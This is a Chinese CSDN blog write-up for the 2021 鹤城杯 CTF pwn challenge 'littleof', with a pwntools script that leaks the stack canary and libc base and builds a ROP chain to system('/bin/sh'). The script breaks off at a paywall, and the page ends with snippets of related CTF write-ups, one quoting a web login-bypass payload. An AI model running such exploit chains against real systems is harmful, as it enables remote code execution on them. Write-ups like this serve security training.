2021鹤城杯pwn部分wp

最新推荐文章于 2024-06-15 17:21:44 发布
最新推荐文章于 2024-06-15 17:21:44 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 学习经历 Pwn 做题记录 文章标签: ctf 鹤城杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/120680522
版权

littleof

白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手)

#!/usr/bin/env python
#coding=utf-8

from pwn import*
sh = remote("182.116.62.85", 27056)
#sh = process('./littleof')
elf = ELF('./littleof')
libc = ELF('./libc-2.27.so')
#libc = elf.libc
context.log_level='debug'

pop_rdi_ret = 0x0400863
main_addr = 0x0400789
pop_rsi_r15_ret = 0x0400861

payload = 'A'*(0x50-8)

sh.recvuntil("?")
sh.sendline(payload)
sh.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(sh.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a

payload = 'a'*(0x50-8) + p64(canary) + 'b'*8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)

sh.recvuntil("!")
sh.sendline(payload)

leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh\x00').next()

payload = 'D'*(0x50-8)

sh.recvuntil("?")
sh.sendline(payload)
sh.recv()

payload = 'c'*(0x50-8) + p64(canary) + 'd'*8 + p64(pop_rdi_ret) + p64(binsh_addr) + p64
最低0.47元/天 解锁文章
北岛静石
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
NSSCTF-杯2021-wp
F1rstb100d
09-22 714
NSSCTF-杯2021-wp
杯2021 Web
feng的博客
10-09 4505
easy_sql_2 登录功能,post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。 username尝试-1'||'1'%23发现是password error!,因此猜测后端的应该是根据传入的username查出对应的password,查到了就不再是username error!,然后讲传入的password进行一次md5后与这个password比较,相同就登录成功。 尝试SQL注入,但是ban了select,因此利用table注入。 数据库
[2021 杯]littleof [泄露canary,libc] 总结
最新发布
qq_48466156的博客
06-15 244
[2021 杯]littleof [泄露canary,libc] 总结
NSSCTF [2021 杯]littleof
红叶的博客
03-02 658
很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出的最大的字节长度为0x100,就是2个buf大小的数据。开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16。因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
PWN · ret2libc】[2021 杯]babyof
Mr_Fmnwon的博客
05-30 1748
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
pwn】2021 壁杯 wp
woodwhale的博客
10-09 3712
pwn】2021 壁杯 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
2021莲杯比赛题包.zip
10-12
【2021莲杯比赛题包.zip】是一个压缩包文件,包含了参与2021年莲杯网络安全竞赛的相关题目和资料。这个比赛很可能是一个网络安全技术挑战赛,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞赛...
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
2021年“绿杯”网络安全大赛
09-30
2021年“绿杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
2021-部分Wp by Rewrite
Re_ly0n的博客
10-09 1253
Web狗的我今天上午满课,下午两节课,抽时间做了两个web,u1s1,两个web都是原题,pwn????刚开始pwn本地全部打通了,然后远程死活不通,最后跑路永劫无间了。哈哈哈哈 WEB MIDDLE_MAGIC %0a绕过第一关最后加%23是# 数组绕过第二关 json 弱类型比较 payload GET aaa=%0apass_the_level_1%23 POST admin[]=1&root_pwd[]=2&level_3={"result":0} SPRING
2021年
unexpectedthing的博客
04-17 2497
[杯 2021]EasyP 考点 php特性 wp 代码 <?php include 'utils.php'; if (isset($_POST['guess'])) { $guess = (string) $_POST['guess']; if ($guess === $secret) { $message = 'Congratulations! The flag is: ' . $flag; } else { $message = 'W
PWN · ret2libc | Canary】[2021 杯]littleof
Mr_Fmnwon的博客
06-08 861
Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。不断总结,不断求学。
反思:泄露canary之后一定要记得处理掉多余的东西————[2021 杯]littleof
m0_73858054的博客
02-28 787
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写出来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
PWN · Stack Smash】[2021 杯]easyecho
Mr_Fmnwon的博客
07-30 685
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分
首届"杯"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 1847
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
2021CTF杯挑战赛题目附件
NNanfeng
10-08 840
除了web题 所有的题目文件都在这里 链接:https://pan.baidu.com/s/1XXFSdNnlMdmlJtCMnl5dSg 提取码:nx87 –来自百度网盘超级会员V1的分享 需要的师傅请自行提取哦
UNCTF2021:Web与Pwn挑战解析
"UNCTF2021WP.pdf 包含了多个网络安全竞赛的解题攻略,涉及Web、Pwn等领域。" 在这个PDF文档中,详细介绍了UNCTF2021网络安全竞赛中的若干挑战及其解决方案。以下是根据提供的部分内容对各个知识点的详细说明: **...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值